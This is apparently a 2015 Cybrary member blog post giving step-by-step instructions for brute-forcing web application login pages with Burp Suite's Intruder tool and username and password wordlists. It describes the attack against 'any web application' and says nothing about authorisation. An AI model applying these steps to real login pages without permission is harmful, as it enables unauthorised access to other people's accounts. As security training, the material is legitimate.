Ready to Start Your Career?
June 22, 2015
Launch a Web Application Bruteforce Using Burp Suite
June 22, 2015
Hello to all Cybrary Members.This is my process on how to launch a bruteforce attack on any web application. Today, web applications are using a defense mechanism we called Authentication and using Login Pages. I'm going to teach you how this bruteforce attack by using a simple proxy tools. Requirements:1. Burp Suite (click here to download)2. Worldlist (search in Google for the username and password Wordlist)3. Common sense Step 1: Ensure the Burp Site is correctly configured in the browser. Perform this step to configure:a. Open Burp Suite>Proxy Tab>Option>Proxy Listeners section. You should see the table and "127.0.0.1:8080" showing the interface column. Check the checkbox. Step 2: Browser configuration. Follow this step:a. Open any browser and change your browser's proxy host address to default 127.0.0.1 and port 8080 for both HTTP and HTTPS protocols. Step 3: Intercept is ON: Follow this step:a. In the Proxy tab and Intercept tab, click the Intercept On button. Step 4: Login Page:a. Go to the login page of the target site and input "test" in the username and password fields. Click enter to submit. Step 5: Capture the Request:a. After hinting enter, you can view the Intercept Tabb. Right-clickc. Choose Send to IntruderNote: The Intruder tab highlights; you can navigate this tab. Step 6: Go to Intruder Tab:a. Clear the pre-set payload positions by clicking the clear button at right corner.b. Highlight the username and password payload position to add them.c. Change the attack type to Clusterbomb. Step 7: Set the Payploads in Usernamea. Go to payloadsb. Set the Payload Set to "1" and type to "Simple List"c. In payload option, enter a possible username from the Wordlist. Step 8: Set the Payploads in Passworda. Change the Payload Set to "2"b. In Payload option, enter a possible password from Wordlist. Step 9: Start the Attacka. Click the menu Intruder in the upper portion.b. Click Start Attack Step 10: Find the Resulta. In Intruder attack window, the tables provide interesting output from the attack.b. By viewing the response window, we can see if there's a successful logged in user. Step 11: Confirma. You can confirm by using the information you see and given by Burp Suite. Thanks!